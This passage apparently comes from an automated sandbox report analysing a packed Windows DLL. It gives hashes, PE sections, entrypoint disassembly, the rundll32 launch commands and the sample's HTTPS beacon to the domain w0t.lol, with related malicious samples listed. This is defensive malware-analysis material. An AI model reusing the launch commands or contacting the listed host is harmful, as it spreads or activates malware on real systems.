    • Number of non-executed functions: 42
    Cookbook Comments:
    • Found application associated with file extension: .dll
    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

    Warnings

    • Exclude process from analysis (whitelisted): dllhost.exe
    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtEnumerateKey calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: e.dll

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    CLOUDFLARENETUShttps://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdfGet hashmaliciousHTMLPhisherBrowse
    • 104.18.38.76
    http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
    • 104.16.79.73
    http://ti6.htinenate.comGet hashmaliciousUnknownBrowse
    • 172.67.162.17
    https://coreleete.de/pt/Odrivex/Get hashmaliciousHTMLPhisherBrowse
    • 104.17.25.14
    Ref_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
    • 188.114.96.3
    g3V051umJf.htmlGet hashmaliciousUnknownBrowse
    • 188.114.96.3
    https://centuriontm.bizarreonly.netGet hashmaliciousEvilProxy, HTMLPhisherBrowse
    • 104.26.13.205
    https://storage.googleapis.com/inbound-mail-attachments-prod/0cbecb77-b573-4b3b-8c97-8b461d262d51?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1758806989&Signature=teNXGJRcW9uuEoVVvD0bLb%2BTGBorxpSu89OlgLR0AZpo8aoMl3JFsBDoXmLnj9QMk%2BAPu8iGsKTPrT4i0XSxxzRmtCLdsbDi23%2FFHfN4OpU3mOnUXtbZ81e7h5Ax%2FIygnxvogL7iGUXrqQUBZEnVkPmXcpAMmBTX7%2Bj4kVf57xBQo4WA9yGdv5Df4b9nDGZMXEYZVxWjPtOk4%2FXapMoV5bYJLgpB%2BR%2F1LUE0IwT1d3wuv1q6TONtaWwducy4mc1%2FJvGqxFuxuW9Y6Ojq%2B7a%2FqCW4DaFdd42O6ViY63C8G7dPbTe9LtxhwHcAk9xg3n5kXh2Z75tDAkK2Ak5mKneP6g%3D%3DGet hashmaliciousUnknownBrowse
    • 1.1.1.1
    nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
    • 188.114.96.3

    JA3 Fingerprints

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    37f463bf4616ecd445d4a1937da06e19Payment copy.vbsGet hashmaliciousFormBook, GuLoaderBrowse
    • 104.21.69.9
    Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
    • 104.21.69.9
    PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
    • 104.21.69.9
    PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
    • 104.21.69.9
    PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
    • 104.21.69.9
    38sab1rT0H.exeGet hashmaliciousLatrodectusBrowse
    • 104.21.69.9
    file.exeGet hashmaliciousLummaC, VidarBrowse
    • 104.21.69.9
    update.jsGet hashmaliciousNetSupport RATBrowse
    • 104.21.69.9
    file.exeGet hashmaliciousLummaC, VidarBrowse
    • 104.21.69.9

    Dropped Files

    No context

    Created / dropped Files

    No created / dropped files found

    Static File Info

    General

    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
    Entropy (8bit):7.857208389757357
    TrID:
    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
    • Generic Win/DOS Executable (2004/3) 0.20%
    • DOS Executable Generic (2002/1) 0.20%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:e.dll
    File size:2'228'224 bytes
    MD5:972d3e17b96745be89b80ec5d8f4f9d3
    SHA1:e97c6461bbdcd91566f4cb75b456e399b7fe06c2
    SHA256:b116511e3960ab5fa53ad6a3243240be11235ebdc323705827713cf12a9aeeda
    SHA512:060b6a99fae4af1d869cd23b84ab2b18d69eeba5ff60ac1355e605e5ecfe049b41fb52dc5989cdac90572133389673cc48fe366494bcb01de278bf93a247982a
    SSDEEP:49152:kwNgYx8UccgdkvUADkwkxSnTyCbJux8OwyvW:kwBVcNgUyZbnTytPTW
    TLSH:90A502BDB064C781D64B397F7E0A332DB53A17805187AD26E51778AE70236EC11B42BB
    File Content Preview:MZ......................@............................................q...q...q..0/...q..u*...q...,...q.......q..u*...q....V..q.......q..M....q..Rich.q..............PE..L...q3.f...........!......... !.....P.............@..........................."........

    File Icon

    Icon Hash:0f372331d982ca5a

    Static PE Info

    General

    Entrypoint:0x401450
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
    DLL Characteristics:TERMINAL_SERVER_AWARE
    Time Stamp:0x66F43371 [Wed Sep 25 15:59:45 2024 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:0
    File Version Major:5
    File Version Minor:0
    Subsystem Version Major:5
    Subsystem Version Minor:0
    Import Hash:abe607481ac2953967a12ac99e7e578f

    Entrypoint Preview

    Instruction
    inc edx
    inc edx
    inc eax
    add dword ptr [00433320h], esp
    inc eax
    dec eax
    inc edx
    dec eax
    jmp 00007F5254DC67DFh
    dec eax
    mov eax, esi
    push eax
    pop dword ptr [00433310h]
    xor edx, 0Ah
    inc edx
    mov eax, edx
    xor dword ptr [00433318h], ebx
    mov eax, edi
    push eax
    pop dword ptr [00433314h]
    mov dword ptr [0043331Ch], ebp
    lea eax, dword ptr [00401210h]
    call eax
    jmp 00007F5254DC6783h
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    xor edx, 5Fh
    mov dword ptr [ebp+00h], eax
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    push ebp
    mov ebp, esp
    push eax
    mov eax, 00000001h
    mov dword ptr [ebp-04h], 00000000h
    add esp, 04h
    pop ebp
    ret
    nop
    nop

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0xf6940x50.rdata
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x20f0000x6d28.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2160000x9a4c.reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG0xf0300x1c.rdata
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0xf0000x30.rdata
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000xc9100xd000d8c6c2ce2710e51965ec969f1e605308False0.09927133413461539data1.5511921998856308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .crt10xe0000x4e0x1000029ebcb0413d7a466159aef461509fffFalse0.025634765625data0.19194904064040105IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata0xf0000x8370x10003936868e1249266d25c6c43831ecaa9cFalse0.298583984375data2.7036873961689896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data0x100000x242000x24000728fa214bf78861ed2be0464e5b2e851False0.2669542100694444data6.204494425770218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    z4g0x350000x7a4cf0x7b000398319310efec22a8e1707da92eb10beFalse0.9946666190294715data7.995421677975023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    qm0xb00000x70e8f0x71000fa2c61d59fecbab30f271e9278c4e647False0.9991314643252213data7.99943170498821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    L0x1210000xe75040xe8000d17b37313f02147b68341a0bca06f4bfFalse0.9966262291217672data7.997710795649098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    CONST0x2090000xd880x1000b052a42265a0ef04c82877e017c33121False0.7548828125data7.057514057791508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    30x20a0000x13a00x20006c371933aac1ef87a68049c0aca61de8False0.5489501953125data5.6043812950914065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    buicKDZl0x20c0000xf0e0x1000ecb3c30a4d5685f7394de862efbb63cdFalse0.756591796875data6.855147821668895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    CRT0x20d0000x19200x2000f44e399cc7eb92f94e27ac6c5b5c2312False0.7213134765625data6.598433129737103IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rsrc0x20f0000x6d280x700085992fe593ac7adce6fc2d273bfa339cFalse0.30946568080357145data5.688832279317778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .reloc0x2160000xada80xb00096222f6edd2ec89fd0af45e507598034False0.1380282315340909data5.6863785572940495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

    Resources

    NameRVASizeTypeLanguageCountryZLIB Complexity
    RT_ICON0x20f3100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.5469043151969981
    RT_ICON0x2103b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.600177304964539
    RT_ICON0x2108200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.5107879924953096
    RT_ICON0x2118c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.648936170212766
    RT_ICON0x211d300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.5668386491557224
    RT_ICON0x212dd80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.6551418439716312
    RT_ICON0x2132400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.5905253283302064
    RT_ICON0x2142e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.6826241134751773
    RT_ICON0x2147500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.5466697936210131
    RT_ICON0x2157f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.6445035460992907
    RT_GROUP_ICON0x215c600x22dataRussianRussia1.0588235294117647
    RT_GROUP_ICON0x215c880x22dataRussianRussia1.0588235294117647
    RT_GROUP_ICON0x215cb00x22dataRussianRussia1.0588235294117647
    RT_GROUP_ICON0x215cd80x22dataRussianRussia1.0588235294117647
    RT_GROUP_ICON0x215d000x22dataRussianRussia1.0588235294117647

    Imports

    DLLImport
    OLEAUT32.dllVarBoolFromR4
    KERNEL32.dllGetSystemTimeAsFileTime, GetStdHandle, SuspendThread, LoadLibraryExW, OutputDebugStringA, GetModuleFileNameW, GetBinaryTypeW
    GDI32.dllBitBlt

    Possible Origin

    Language of compilation systemCountry where language is spokenMap
    RussianRussia

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Sep 26, 2024 13:12:33.667886019 CEST49757443192.168.11.20104.21.69.9
    Sep 26, 2024 13:12:33.667989969 CEST44349757104.21.69.9192.168.11.20
    Sep 26, 2024 13:12:33.668176889 CEST49757443192.168.11.20104.21.69.9
    Sep 26, 2024 13:12:33.694613934 CEST49757443192.168.11.20104.21.69.9
    Sep 26, 2024 13:12:33.694696903 CEST44349757104.21.69.9192.168.11.20
    Sep 26, 2024 13:12:33.935889959 CEST44349757104.21.69.9192.168.11.20
    Sep 26, 2024 13:12:33.936254978 CEST49757443192.168.11.20104.21.69.9
    Sep 26, 2024 13:12:33.967852116 CEST49757443192.168.11.20104.21.69.9
    Sep 26, 2024 13:12:33.967924118 CEST44349757104.21.69.9192.168.11.20
    Sep 26, 2024 13:12:33.968811035 CEST44349757104.21.69.9192.168.11.20
    Sep 26, 2024 13:12:33.969001055 CEST49757443192.168.11.20104.21.69.9
    Sep 26, 2024 13:12:33.970993042 CEST49757443192.168.11.20104.21.69.9
    Sep 26, 2024 13:12:34.012290001 CEST44349757104.21.69.9192.168.11.20
    Sep 26, 2024 13:12:36.115550041 CEST44349757104.21.69.9192.168.11.20
    Sep 26, 2024 13:12:36.115786076 CEST49757443192.168.11.20104.21.69.9
    Sep 26, 2024 13:12:36.115868092 CEST44349757104.21.69.9192.168.11.20
    Sep 26, 2024 13:12:36.116086960 CEST49757443192.168.11.20104.21.69.9
    Sep 26, 2024 13:12:36.116092920 CEST44349757104.21.69.9192.168.11.20
    Sep 26, 2024 13:12:36.116266966 CEST49757443192.168.11.20104.21.69.9
    Sep 26, 2024 13:12:36.117410898 CEST49757443192.168.11.20104.21.69.9
    Sep 26, 2024 13:12:36.117410898 CEST49757443192.168.11.20104.21.69.9
    Sep 26, 2024 13:12:36.117497921 CEST44349757104.21.69.9192.168.11.20
    Sep 26, 2024 13:12:36.117641926 CEST49757443192.168.11.20104.21.69.9

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Sep 26, 2024 13:12:33.544146061 CEST5899253192.168.11.201.1.1.1
    Sep 26, 2024 13:12:33.661926031 CEST53589921.1.1.1192.168.11.20

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Sep 26, 2024 13:12:33.544146061 CEST192.168.11.201.1.1.10x5b63Standard query (0)w0t.lolA (IP address)IN (0x0001)false

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Sep 26, 2024 13:12:33.661926031 CEST1.1.1.1192.168.11.200x5b63No error (0)w0t.lol104.21.69.9A (IP address)IN (0x0001)false
    Sep 26, 2024 13:12:33.661926031 CEST1.1.1.1192.168.11.200x5b63No error (0)w0t.lol172.67.202.143A (IP address)IN (0x0001)false

    HTTP Request Dependency Graph

    • w0t.lol

    HTTPS Proxied Packets

    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.11.2049757104.21.69.9443916C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    2024-09-26 11:12:33 UTC714OUTGET /u1AnNcgaAe2bF5Pgk9d0LeWL8vpSDZkJZinYdkhr9pqBGLRnRX5Vvq3izq9ug8qLY6yKal3j6Ee_t1iMTK_cFx1mTVmw7UgAUUyYrKRm3RdsqVNvpv6_kKFgqugw7GxorO8WhL4PsC4qoVKtjEe0DOKO8ZDw1Tjmp1kilcdzr5ins6cIF1bcVHlXvd0LhB36FiVt_ML5BynNwrbTMXHBlrYMYDHKv7fr-4V207YlIg6tWfJiMRdzu_qeSooE4jIQIx6aML1s49f-Ri0B1CS37y5JuxrX5yqAG8oDK4QDEBXT7TWGpGoNsuTFyKiEDbJQD0BBibjsRhVHiSSidzARVzTSro8qK1SpnxWQFVotTjKG7CepcMDibvLwH_Jr5CkuCYLKtK52-cvQybIZ4Fhw0wjCJODhJJbW1bSQqThISFsFSjkb8WhpxT9Aqfic0XA HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: w0t.lol
    Connection: Keep-Alive
    2024-09-26 11:12:36 UTC306INHTTP/1.1 404 Not Found
    Date: Thu, 26 Sep 2024 11:12:36 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Cache-Control: no-cache, no-store, must-revalidate
    CF-Cache-Status: DYNAMIC
    Speculation-Rules: "/cdn-cgi/speculation"
    Server: cloudflare
    CF-RAY: 8c92d1d5482d3af0-IAD
    2024-09-26 11:12:36 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
    2024-09-26 11:12:36 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Target ID:0
    Start time:07:11:36
    Start date:26/09/2024
    Path:C:\Windows\System32\loaddll32.exe
    Wow64 process (32bit):true
    Commandline:loaddll32.exe "C:\Users\user\Desktop\e.dll"
    Imagebase:0x5d0000
    File size:126'464 bytes
    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    General

    Target ID:1
    Start time:07:11:36
    Start date:26/09/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff750020000
    File size:875'008 bytes
    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    General

    Target ID:2
    Start time:07:11:36
    Start date:26/09/2024
    Path:C:\Windows\SysWOW64\cmd.exe
    Wow64 process (32bit):true
    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1
    Imagebase:0x490000
    File size:236'544 bytes
    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    General

    Target ID:3
    Start time:07:11:36
    Start date:26/09/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32.exe "C:\Users\user\Desktop\e.dll",#1
    Imagebase:0xd10000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Disassembly

    Reset < >

      Execution Graph

      Execution Coverage:7%
      Dynamic/Decrypted Code Coverage:100%
      Signature Coverage:20%
      Total number of Nodes:15
      Total number of Limit Nodes:1
      execution_graph 604 c51450 605 c5145f 604->605 607 c51210 605->607 609 c5121b 607->609 608 c51224 608->605 609->608 613 c5bac0 609->613 614 c5bafc GetBinaryTypeW 613->614 615 c51298 614->615 615->608 616 c5c8c0 615->616 617 c5c8dc 616->617 619 c5c906 617->619 620 c5c340 617->620 619->608 624 c5bb70 620->624 623 c5c38c 625 c5bb84 GetPEB 624->625 625->623

      Callgraph

      • Executed
      • Not Executed
      • Opacity -> Relevance
      • Disassembly available
      callgraph 0 Function_00E5A9E5 1 Function_00E5A6E6 2 Function_00E595E1 3 Function_00C512C0 4 Function_00C5C8C0 13 Function_00C510E0 4->13 14 Function_00C5CFE0 4->14 48 Function_00C5C340 4->48 84 Function_00C5D370 4->84 117 Function_00C5D730 4->117 118 Function_00C5BE30 4->118 5 Function_00C5BAC0 6 Function_00E5B0EF 7 Function_00E598F4 8 Function_00E5D1F4 9 Function_00C5C7D0 38 Function_00C5CEA0 9->38 9->117 10 Function_00C5B9D0 82 Function_00C5BB70 10->82 11 Function_00E595F9 12 Function_00E5A5FA 32 Function_00C51090 13->32 14->38 72 Function_00C5CE60 14->72 95 Function_00C5D700 14->95 108 Function_00C5BF20 14->108 15 Function_00C5D1E0 16 Function_00E5B0C3 17 Function_00E5AFC2 18 Function_00E5A9D1 19 Function_00E59AD1 20 Function_00E5AED3 21 Function_00E5A2D2 22 Function_00E5AAD8 23 Function_00E599DB 24 Function_00C5D680 25 Function_00C5148E 26 Function_00E592AE 27 Function_00E5A2AE 28 Function_00C5C391 29 Function_00C5C590 29->82 30 Function_00C5C890 31 Function_00C5C190 33 Function_00C5BE90 33->15 101 Function_00C5C610 33->101 34 Function_00E5A9BE 35 Function_00E5ADBE 36 Function_00D711B3 37 Function_00C5C2A0 37->38 37->117 59 Function_00C5CF50 38->59 39 Function_00C5BBA0 40 Function_00E5A28F 41 Function_00E5B189 42 Function_00C5D4AA 73 Function_00C5D160 42->73 43 Function_00E5AE8A 44 Function_00E5AB96 45 Function_00E5A592 46 Function_00E5A564 47 Function_00E5AC66 48->82 49 Function_00C51340 50 Function_00E5AA62 51 Function_00E59D6E 52 Function_00E5B069 53 Function_00C5D448 53->33 54 Function_00E5996B 55 Function_00E5966A 56 Function_00E5AE71 57 Function_00C51450 100 Function_00C51210 57->100 58 Function_00C5C550 83 Function_00C5C270 58->83 60 Function_00C5CA50 61 Function_00C5C150 62 Function_00E59272 63 Function_00E5987D 64 Function_00E5957F 65 Function_00C5C65B 66 Function_00E5B27B 67 Function_00E5C17B 68 Function_00E5A57A 69 Function_00E59A45 70 Function_00E5A447 71 Function_00E5AB41 74 Function_00C5CA60 74->29 74->30 74->38 74->82 109 Function_00C5CC20 74->109 75 Function_00C5BA60 76 Function_00E5A949 77 Function_00E5984B 78 Function_00E5A34B 79 Function_00E5A257 80 Function_00E59351 81 Function_00C5B970 83->31 84->38 84->60 84->82 84->95 85 Function_00E59552 86 Function_00E59D5F 87 Function_00E59A59 88 Function_00E5925A 89 Function_00E5975A 90 Function_00E5AE5A 91 Function_00E59227 92 Function_00E5A526 93 Function_00C51000 94 Function_00C5BC00 94->58 95->37 95->74 96 Function_00E59523 97 Function_00E59722 98 Function_00E5B128 99 Function_00E5962A 100->3 100->4 100->5 100->10 100->75 100->81 110 Function_00C5B920 100->110 102 Function_00E5A730 103 Function_00E5AE3D 104 Function_00E5A83F 105 Function_00E5AA3F 106 Function_00E5AA05 107 Function_00E5B204 108->61 119 Function_00C5C530 108->119 120 Function_00C5C030 108->120 109->9 109->30 109->118 111 Function_00E59602 112 Function_00D6E038 113 Function_00C5BC2A 114 Function_00E59415 115 Function_00E59A15 116 Function_00E59917 117->24 117->94 120->73 120->82 121 Function_00E5AA10 122 Function_00E5A61E

      Executed Functions

      Function 00C5BAC0 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 c5bac0-c5bb28 GetBinaryTypeW 2 c5bb41-c5bb48 0->2 3 c5bb2a-c5bb59 0->3 4 c5bb2c-c5bb37 2->4 6 c5bb38-c5bb3f 3->6 7 c5bb5b-c5bb62 3->7 6->4 7->4
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.27456582362.0000000000C5B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
      • Associated: 00000000.00000002.27456552819.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27456582362.0000000000C51000.00000020.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27456647904.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27456677924.0000000000C60000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27456733312.0000000000C85000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27457175125.0000000000E5F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_c50000_loaddll32.jbxd
      Similarity
      • API ID: BinaryType
      • String ID:
      • API String ID: 3726996659-0
      • Opcode ID: 0ffcd01ad2180c65efe9a9a5f27c7d2c4e880340f1a29fcbe0f9aeb2cbf5b52d
      • Instruction ID: 33854a4477c1b54d9ea66a77fbadab0b6d235f0343c18c3f5a3124e87be6f831
      • Opcode Fuzzy Hash: 0ffcd01ad2180c65efe9a9a5f27c7d2c4e880340f1a29fcbe0f9aeb2cbf5b52d
      • Instruction Fuzzy Hash: BB111BB49402188BDB24EF64E8483E8FBB0AB10305F208199D819A7284D3B59EC9CF96

      Non-executed Functions

      Function 00C5C340 Relevance: .1, Instructions: 121COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.27456582362.0000000000C5B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
      • Associated: 00000000.00000002.27456552819.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27456582362.0000000000C51000.00000020.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27456647904.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27456677924.0000000000C60000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27456733312.0000000000C85000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27457175125.0000000000E5F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_c50000_loaddll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 8e20820679ec8ef0206cadb4f66a2a2ee31c08285cafc9d6571aca241d77074b
      • Instruction ID: ad6d3bfa4f5c3bd6959b5d5ed250514cd69032b8fefb662ebf5a759231271e7f
      • Opcode Fuzzy Hash: 8e20820679ec8ef0206cadb4f66a2a2ee31c08285cafc9d6571aca241d77074b
      • Instruction Fuzzy Hash: FB512978A04318CFD704CF89C4D4ABDB7B1FB48701F60845ADC52AB3A0D735A995EB59
      Function 00C51090 Relevance: .0, Instructions: 29COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.27456582362.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
      • Associated: 00000000.00000002.27456552819.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27456582362.0000000000C5B000.00000020.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27456647904.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27456677924.0000000000C60000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.27456733312.0000000000C85000.00000008.00000001.01000000.00000003.sdmpDownload File
